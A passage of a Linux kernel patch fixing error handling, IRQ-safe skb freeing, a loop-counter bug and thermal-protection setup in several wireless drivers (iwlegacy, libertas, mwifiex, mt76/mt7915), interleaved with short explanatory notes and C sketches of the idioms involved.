+ 	mutex_unlock(&il->mutex);
+ }
+ 
+-static void
++static int
+ il4965_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -6233,6 +6235,8 @@ il4965_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il4965_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -6618,7 +6622,10 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto out_disable_msi;
+ 	}
+ 
+-	il4965_setup_deferred_work(il);
++	err = il4965_setup_deferred_work(il);
++	if (err)
++		goto out_free_irq;
++
+ 	il4965_setup_handlers(il);
+ 
+ 	/*********************************************
+@@ -6656,6 +6663,7 @@ il4965_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
+ 	il->workqueue = NULL;
++out_free_irq:
+ 	free_irq(il->pci_dev->irq, il);
+ out_disable_msi:
+ 	pci_disable_msi(il->pci_dev);
+diff --git a/drivers/net/wireless/intel/iwlegacy/common.c b/drivers/net/wireless/intel/iwlegacy/common.c
+index 341c17fe2af4d..96002121bb8b2 100644
+--- a/drivers/net/wireless/intel/iwlegacy/common.c
++++ b/drivers/net/wireless/intel/iwlegacy/common.c
+@@ -5174,7 +5174,7 @@ il_mac_reset_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	memset(&il->current_ht_config, 0, sizeof(struct il_ht_config));
+ 
+ 	/* new association get rid of ibss beacon skb */
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = NULL;
+ 	il->timestamp = 0;
+ 
+@@ -5293,7 +5293,7 @@ il_beacon_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
+ 	}
+ 
+ 	spin_lock_irqsave(&il->lock, flags);
+-	dev_kfree_skb(il->beacon_skb);
++	dev_consume_skb_irq(il->beacon_skb);
+ 	il->beacon_skb = skb;
+ 
+ 	timestamp = ((struct ieee80211_mgmt *)skb->data)->u.beacon.timestamp;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index f9d11935ed97e..67dfb77fedf79 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -788,7 +788,7 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+ 	else if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+ 
+ 	schedule_work(&mei->netdev_work);
+ 
+@@ -829,7 +829,7 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 		 */
+ 		mei->csme_taking_ownership = true;
+ 
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
+ 	} else {
+ 		iwl_mei_send_sap_msg(cldev,
+ 				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
+@@ -1774,7 +1774,7 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 			if (mei->amt_enabled)
+ 				iwl_mei_send_sap_msg(mei->cldev,
+ 						     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state, false);
++			ops->rfkill(priv, mei->link_prot_state);
+ 		}
+ 	}
+ 	ret = 0;
+diff --git a/drivers/net/wireless/intersil/orinoco/hw.c b/drivers/net/wireless/intersil/orinoco/hw.c
+index 0aea35c9c11c7..4fcca08e50de2 100644
+--- a/drivers/net/wireless/intersil/orinoco/hw.c
++++ b/drivers/net/wireless/intersil/orinoco/hw.c
+@@ -931,6 +931,8 @@ int __orinoco_hw_setup_enc(struct orinoco_private *priv)
+ 			err = hermes_write_wordrec(hw, USER_BAP,
+ 					HERMES_RID_CNFAUTHENTICATION_AGERE,
+ 					auth_flag);
++			if (err)
++				return err;
+ 		}
+ 		err = hermes_write_wordrec(hw, USER_BAP,
+ 					   HERMES_RID_CNFWEPENABLED_AGERE,
+diff --git a/drivers/net/wireless/marvell/libertas/cmdresp.c b/drivers/net/wireless/marvell/libertas/cmdresp.c
+index cb515c5584c1f..74cb7551f4275 100644
+--- a/drivers/net/wireless/marvell/libertas/cmdresp.c
++++ b/drivers/net/wireless/marvell/libertas/cmdresp.c
+@@ -48,7 +48,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv,
+ 
+ 	/* Free Tx and Rx packets */
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+diff --git a/drivers/net/wireless/marvell/libertas/if_usb.c b/drivers/net/wireless/marvell/libertas/if_usb.c
+index 32fdc4150b605..2240b4db8c036 100644
+--- a/drivers/net/wireless/marvell/libertas/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas/if_usb.c
+@@ -637,7 +637,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	priv->resp_len[i] = (recvlength - MESSAGE_HEADER_LEN);
+ 	memcpy(priv->resp_buf[i], recvbuff + MESSAGE_HEADER_LEN,
+ 		priv->resp_len[i]);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbs_notify_command_response(priv, i);
+ 
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
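
[Note on the idiom] The libertas changes above (and the libertas_tf one just below) replace kfree_skb() with dev_kfree_skb_irq() inside spin_lock_irqsave() regions. These completion paths can run in hard-IRQ/atomic context, where kfree_skb() is not safe; dev_kfree_skb_irq() instead queues the skb on the per-CPU completion queue and raises NET_TX_SOFTIRQ, deferring the actual free to softirq context. A minimal kernel-style sketch of the idiom, assuming a hypothetical struct my_priv (not from this patch):

    /* Kernel-style sketch, not a standalone program. */
    #include <linux/skbuff.h>
    #include <linux/spinlock.h>

    struct my_priv {
        spinlock_t lock;
        struct sk_buff *cur_skb;
    };

    static void my_drop_current_tx(struct my_priv *priv)
    {
        unsigned long flags;

        spin_lock_irqsave(&priv->lock, flags);
        if (priv->cur_skb) {
            /* Safe with IRQs off: only queues the skb so it is
             * freed later in softirq context. */
            dev_kfree_skb_irq(priv->cur_skb);
            priv->cur_skb = NULL;
        }
        spin_unlock_irqrestore(&priv->lock, flags);
    }
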
+diff --git a/drivers/net/wireless/marvell/libertas/main.c b/drivers/net/wireless/marvell/libertas/main.c
+index 8f5220cee1123..78e8b5aecec0e 100644
+--- a/drivers/net/wireless/marvell/libertas/main.c
++++ b/drivers/net/wireless/marvell/libertas/main.c
+@@ -216,7 +216,7 @@ int lbs_stop_iface(struct lbs_private *priv)
+ 
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	priv->iface_running = false;
+-	kfree_skb(priv->currenttxskb);
++	dev_kfree_skb_irq(priv->currenttxskb);
+ 	priv->currenttxskb = NULL;
+ 	priv->tx_pending_len = 0;
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+@@ -869,6 +869,7 @@ static int lbs_init_adapter(struct lbs_private *priv)
+ 	ret = kfifo_alloc(&priv->event_fifo, sizeof(u32) * 16, GFP_KERNEL);
+ 	if (ret) {
+ 		pr_err("Out of memory allocating event FIFO buffer\n");
++		lbs_free_cmd_buffer(priv);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/libertas_tf/if_usb.c b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+index 75b5319d033f3..1750f5e93de21 100644
+--- a/drivers/net/wireless/marvell/libertas_tf/if_usb.c
++++ b/drivers/net/wireless/marvell/libertas_tf/if_usb.c
+@@ -613,7 +613,7 @@ static inline void process_cmdrequest(int recvlength, uint8_t *recvbuff,
+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	memcpy(priv->cmd_resp_buff, recvbuff + MESSAGE_HEADER_LEN,
+ 	       recvlength - MESSAGE_HEADER_LEN);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbtf_cmd_response_rx(priv);
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n.c b/drivers/net/wireless/marvell/mwifiex/11n.c
+index 4af57e6d43932..90e4011008981 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n.c
+@@ -878,7 +878,7 @@ mwifiex_send_delba_txbastream_tbl(struct mwifiex_private *priv, u8 tid)
+  */
+ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ {
+-	u8 i;
++	u8 i, j;
+ 	u32 tx_win_size;
+ 	struct mwifiex_private *priv;
+ 
+@@ -909,8 +909,8 @@ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ 		if (tx_win_size != priv->add_ba_param.tx_win_size) {
+ 			if (!priv->media_connected)
+ 				continue;
+-			for (i = 0; i < MAX_NUM_TID; i++)
+-				mwifiex_send_delba_txbastream_tbl(priv, i);
++			for (j = 0; j < MAX_NUM_TID; j++)
++				mwifiex_send_delba_txbastream_tbl(priv, j);
+ 		}
+ 	}
+ }
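
[Note on the idiom] The mwifiex fix above is the classic reused-loop-counter bug: the same variable i served both the outer walk over interfaces and the inner delba loop, so after the inner loop ran the outer counter was left at MAX_NUM_TID and the outer loop terminated early. A self-contained plain-C illustration of the failure mode (the sizes are made up):

    #include <stdio.h>

    #define N_IFACES 4
    #define N_TIDS   8

    int main(void)
    {
        int visited = 0;
        int i;

        for (i = 0; i < N_IFACES; i++) {
            /* BUG: reusing 'i' clobbers the outer counter; the inner
             * loop leaves i == N_TIDS, so the outer condition fails
             * after a single iteration. */
            for (i = 0; i < N_TIDS; i++)
                ;
            visited++;
        }
        printf("ifaces visited: %d (expected %d)\n", visited, N_IFACES);
        return 0;
    }
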
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 06161815c180e..d147dc698c9db 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -737,6 +737,7 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 		return;
+ 
+ 	spin_lock_bh(&q->lock);
++
+ 	do {
+ 		buf = mt76_dma_dequeue(dev, q, true, NULL, NULL, &more, NULL);
+ 		if (!buf)
+@@ -744,6 +745,12 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		skb_free_frag(buf);
+ 	} while (1);
++
++	if (q->rx_head) {
++		dev_kfree_skb(q->rx_head);
++		q->rx_head = NULL;
++	}
++
+ 	spin_unlock_bh(&q->lock);
+ 
+ 	if (!q->rx_page.va)
+@@ -769,12 +776,6 @@ mt76_dma_rx_reset(struct mt76_dev *dev, enum mt76_rxq_id qid)
+ 	mt76_dma_rx_cleanup(dev, q);
+ 	mt76_dma_sync_idx(dev, q);
+ 	mt76_dma_rx_fill(dev, q);
+-
+-	if (!q->rx_head)
+-		return;
+-
+-	dev_kfree_skb(q->rx_head);
+-	q->rx_head = NULL;
+ }
+ 
+ static void
+@@ -975,8 +976,7 @@ void mt76_dma_cleanup(struct mt76_dev *dev)
+ 		struct mt76_queue *q = &dev->q_rx[i];
+ 
+ 		netif_napi_del(&dev->napi[i]);
+-		if (FIELD_GET(MT_QFLAG_WED_TYPE, q->flags))
+-			mt76_dma_rx_cleanup(dev, q);
++		mt76_dma_rx_cleanup(dev, q);
+ 	}
+ 
+ 	mt76_free_pending_txwi(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac.h b/drivers/net/wireless/mediatek/mt76/mt76_connac.h
+index 8ba883b03e500..2ee9a3c8e25c4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac.h
+@@ -370,6 +370,9 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 				 struct sk_buff *skb, struct mt76_wcid *wcid,
+ 				 struct ieee80211_key_conf *key, int pid,
+ 				 enum mt76_txq_id qid, u32 changed);
++u16 mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy,
++				 struct ieee80211_vif *vif,
++				 bool beacon, bool mcast);
+ bool mt76_connac2_mac_fill_txs(struct mt76_dev *dev, struct mt76_wcid *wcid,
+ 			       __le32 *txs_data);
+ bool mt76_connac2_mac_add_txs_skb(struct mt76_dev *dev, struct mt76_wcid *wcid,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index fd60123fb2840..aed4ee95fb2ec 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -267,9 +267,9 @@ int mt76_connac_init_tx_queues(struct mt76_phy *phy, int idx, int n_desc,
+ }
+ EXPORT_SYMBOL_GPL(mt76_connac_init_tx_queues);
+ 
+-static u16
+-mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy, struct ieee80211_vif *vif,
+-			     bool beacon, bool mcast)
++u16 mt76_connac2_mac_tx_rate_val(struct mt76_phy *mphy,
++				 struct ieee80211_vif *vif,
++				 bool beacon, bool mcast)
+ {
+ 	u8 mode = 0, band = mphy->chandef.chan->band;
+ 	int rateidx = 0, mcast_rate;
+@@ -319,6 +319,7 @@ out:
+ 	return FIELD_PREP(MT_TX_RATE_IDX, rateidx) |
+ 	       FIELD_PREP(MT_TX_RATE_MODE, mode);
+ }
++EXPORT_SYMBOL_GPL(mt76_connac2_mac_tx_rate_val);
+ 
+ static void
+ mt76_connac2_mac_write_txwi_8023(__le32 *txwi, struct sk_buff *skb,
+@@ -930,7 +931,7 @@ int mt76_connac2_reverse_frag0_hdr_trans(struct ieee80211_vif *vif,
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_offset + sizeof(struct ethhdr) - 2);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+index f1e942b9a887b..82fdf6d794bcf 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+@@ -1198,7 +1198,7 @@ enum {
+ 	MCU_UNI_CMD_REPT_MUAR = 0x09,
+ 	MCU_UNI_CMD_WSYS_CONFIG = 0x0b,
+ 	MCU_UNI_CMD_REG_ACCESS = 0x0d,
+-	MCU_UNI_CMD_POWER_CREL = 0x0f,
++	MCU_UNI_CMD_POWER_CTRL = 0x0f,
+ 	MCU_UNI_CMD_RX_HDR_TRANS = 0x12,
+ 	MCU_UNI_CMD_SER = 0x13,
+ 	MCU_UNI_CMD_TWT = 0x14,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c b/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
+index 6c6c8ada7943b..d543ef3de65be 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x0/phy.c
+@@ -642,7 +642,12 @@ mt76x0_phy_get_target_power(struct mt76x02_dev *dev, u8 tx_mode,
+ 		if (tx_rate > 9)
+ 			return -EINVAL;
+ 
+-		*target_power = cur_power + dev->rate_power.vht[tx_rate];
++		*target_power = cur_power;
++		if (tx_rate > 7)
++			*target_power += dev->rate_power.vht[tx_rate - 8];
++		else
++			*target_power += dev->rate_power.ht[tx_rate];
++
+ 		*target_pa_power = mt76x0_phy_get_rf_pa_mode(dev, 1, tx_rate);
+ 		break;
+ 	default:
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+index fb46c2c1784f2..5a46813a59eac 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+@@ -811,7 +811,7 @@ mt7915_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
+@@ -996,7 +996,7 @@ mt7915_rate_txpower_get(struct file *file, char __user *user_buf,
+ 
+ 	ret = mt7915_mcu_get_txpower_sku(phy, txpwr, sizeof(txpwr));
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/* Txpower propagation path: TMAC -> TXV -> BBP */
+ 	len += scnprintf(buf + len, sz - len,
+@@ -1047,6 +1047,8 @@ mt7915_rate_txpower_get(struct file *file, char __user *user_buf,
+ 			 mt76_get_field(dev, reg, MT_WF_PHY_TPC_POWER));
+ 
+ 	ret = simple_read_from_buffer(user_buf, count, ppos, buf, len);
++
++out:
+ 	kfree(buf);
+ 	return ret;
+ }
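
[Note on the idiom] The qid change in the hunk above (mirrored in the mt7996 debugfs hunk further down) adds a (u32) cast before shifting the u8 queue id by 24 bits. Without the cast, the u8 is first promoted to signed int, and a value with its top bit set would shift a 1 into the sign bit, which is signed overflow and therefore undefined behaviour. A small compilable demonstration of the safe form:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint8_t qid = 0x80;

        /* uint32_t bad = qid << 24;
         *   'qid' is promoted to (signed) int, so for qid >= 0x80 the
         *   shift overflows into the sign bit: undefined behaviour. */
        uint32_t good = (uint32_t)qid << 24;   /* well-defined */

        printf("0x%08x\n", good);              /* prints 0x80000000 */
        return 0;
    }
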
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 59069fb864147..24efa280dd868 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -110,18 +110,23 @@ static int mt7915_eeprom_load(struct mt7915_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7915_EEPROM_BLOCK_SIZE;
+ 
+-		mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 29)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(eeprom_size,
+-					 MT7915_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7915_mcu_get_eeprom(dev,
+-					      i * MT7915_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(eeprom_size, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7915_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7915_check_eeprom(dev);
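
[Note on the idiom] The eeprom loader above (like its mt7996 counterpart later in this patch) now checks the return value of every MCU efuse read instead of silently continuing with a partially initialized buffer. The general pattern, sketched as a standalone C program with a hypothetical fallible read_block():

    #include <stdio.h>

    #define BLK_SZ   16
    #define TOTAL_SZ 64

    /* Hypothetical reader: 0 on success, negative on error. */
    static int read_block(unsigned int offset, unsigned char *dst)
    {
        (void)dst;
        return offset < TOTAL_SZ ? 0 : -1;
    }

    static int load_all(unsigned char *buf)
    {
        unsigned int blocks = (TOTAL_SZ + BLK_SZ - 1) / BLK_SZ;
        unsigned int i;
        int ret;

        for (i = 0; i < blocks; i++) {
            ret = read_block(i * BLK_SZ, buf + i * BLK_SZ);
            if (ret < 0)
                return ret;   /* propagate instead of ignoring */
        }
        return 0;
    }

    int main(void)
    {
        unsigned char buf[TOTAL_SZ];

        printf("load_all: %d\n", load_all(buf));
        return 0;
    }
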
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index c810c31fbd6e9..a80ae31e7abff 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -83,9 +83,23 @@ static ssize_t mt7915_thermal_temp_store(struct device *dev,
+ 
+ 	mutex_lock(&phy->dev->mt76.mutex);
+ 	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 60, 130);
++
++	if ((i - 1 == MT7915_CRIT_TEMP_IDX &&
++	     val > phy->throttle_temp[MT7915_MAX_TEMP_IDX]) ||
++	    (i - 1 == MT7915_MAX_TEMP_IDX &&
++	     val < phy->throttle_temp[MT7915_CRIT_TEMP_IDX])) {
++		dev_err(phy->dev->mt76.dev,
++			"temp1_max shall be greater than temp1_crit.");
++		return -EINVAL;
++	}
++
+ 	phy->throttle_temp[i - 1] = val;
+ 	mutex_unlock(&phy->dev->mt76.mutex);
+ 
++	ret = mt7915_mcu_set_thermal_protect(phy);
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+@@ -134,9 +148,6 @@ mt7915_thermal_set_cur_throttle_state(struct thermal_cooling_device *cdev,
+ 	if (state > MT7915_CDEV_THROTTLE_MAX)
+ 		return -EINVAL;
+ 
+-	if (phy->throttle_temp[0] > phy->throttle_temp[1])
+-		return 0;
+-
+ 	if (state == phy->cdev_state)
+ 		return 0;
+ 
+@@ -198,11 +209,10 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 		return PTR_ERR(hwmon);
+ 
+ 	/* initialize critical/maximum high temperature */
+-	phy->throttle_temp[0] = 110;
+-	phy->throttle_temp[1] = 120;
++	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = 110;
++	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = 120;
+ 
+-	return mt7915_mcu_set_thermal_throttling(phy,
+-						 MT7915_THERMAL_THROTTLE_MAX);
++	return 0;
+ }
+ 
+ static void mt7915_led_set_config(struct led_classdev *led_cdev,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index f0d5a3603902a..1a6def77db571 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -1061,9 +1061,6 @@ static void mt7915_mac_add_txs(struct mt7915_dev *dev, void *data)
+ 	u16 wcidx;
+ 	u8 pid;
+ 
+-	if (le32_get_bits(txs_data[0], MT_TXS0_TXS_FORMAT) > 1)
+-		return;
+-
+ 	wcidx = le32_get_bits(txs_data[2], MT_TXS2_WCID);
+ 	pid = le32_get_bits(txs_data[3], MT_TXS3_PID);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 0511d6a505b09..7589af4b3dab7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -57,6 +57,17 @@ int mt7915_run(struct ieee80211_hw *hw)
+ 		mt7915_mac_enable_nf(dev, phy->mt76->band_idx);
+ 	}
+ 
++	ret = mt7915_mcu_set_thermal_throttling(phy,
++						MT7915_THERMAL_THROTTLE_MAX);
++
++	if (ret)
++		goto out;
++
++	ret = mt7915_mcu_set_thermal_protect(phy);
++
++	if (ret)
++		goto out;
++
+ 	ret = mt76_connac_mcu_set_rts_thresh(&dev->mt76, 0x92b,
+ 					     phy->mt76->band_idx);
+ 	if (ret)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index b2652de082baa..f566ba77b2ed4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -2349,13 +2349,14 @@ void mt7915_mcu_exit(struct mt7915_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7915_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2792,8 +2793,9 @@ int mt7915_mcu_get_eeprom(struct mt7915_dev *dev, u32 offset)
+ 	int ret;
+ 	u8 *buf;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_ACCESS), &req,
+-				sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_ACCESS),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2818,8 +2820,9 @@ int mt7915_mcu_get_eeprom_free_block(struct mt7915_dev *dev, u8 *block_num)
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_FREE_BLOCK), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_FREE_BLOCK),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -3058,6 +3061,29 @@ int mt7915_mcu_get_temperature(struct mt7915_phy *phy)
+ }
+ 
+ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
++{
++	struct mt7915_dev *dev = phy->dev;
++	struct mt7915_mcu_thermal_ctrl req = {
++		.band_idx = phy->mt76->band_idx,
++		.ctrl_id = THERMAL_PROTECT_DUTY_CONFIG,
++	};
++	int level, ret;
++
++	/* set duty cycle and level */
++	for (level = 0; level < 4; level++) {
++		req.duty.duty_level = level;
++		req.duty.duty_cycle = state;
++		state /= 2;
++
++		ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
++					&req, sizeof(req), false);
++		if (ret)
++			return ret;
++	}
++	return 0;
++}
++
++int mt7915_mcu_set_thermal_protect(struct mt7915_phy *phy)
+ {
+ 	struct mt7915_dev *dev = phy->dev;
+ 	struct {
+@@ -3070,29 +3096,18 @@ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
+ 	} __packed req = {
+ 		.ctrl = {
+ 			.band_idx = phy->mt76->band_idx,
++			.type.protect_type = 1,
++			.type.trigger_type = 1,
+ 		},
+ 	};
+-	int level;
+-
+-	if (!state) {
+-		req.ctrl.ctrl_id = THERMAL_PROTECT_DISABLE;
+-		goto out;
+-	}
+-
+-	/* set duty cycle and level */
+-	for (level = 0; level < 4; level++) {
+-		int ret;
++	int ret;
+ 
+-		req.ctrl.ctrl_id = THERMAL_PROTECT_DUTY_CONFIG;
+-		req.ctrl.duty.duty_level = level;
+-		req.ctrl.duty.duty_cycle = state;
+-		state /= 2;
++	req.ctrl.ctrl_id = THERMAL_PROTECT_DISABLE;
++	ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
++				&req, sizeof(req.ctrl), false);
+ 
+-		ret = mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
+-					&req, sizeof(req.ctrl), false);
+-		if (ret)
+-			return ret;
+-	}
++	if (ret)
++		return ret;
+ 
+ 	/* set high-temperature trigger threshold */
+ 	req.ctrl.ctrl_id = THERMAL_PROTECT_ENABLE;
+@@ -3101,10 +3116,6 @@ int mt7915_mcu_set_thermal_throttling(struct mt7915_phy *phy, u8 state)
+ 	req.trigger_temp = cpu_to_le32(phy->throttle_temp[1]);
+ 	req.sustain_time = cpu_to_le16(10);
+ 
+-out:
+-	req.ctrl.type.protect_type = 1;
+-	req.ctrl.type.trigger_type = 1;
+-
+ 	return mt76_mcu_send_msg(&dev->mt76, MCU_EXT_CMD(THERMAL_PROT),
+ 				 &req, sizeof(req), false);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+index 8388e2a658535..afa558c9a9302 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
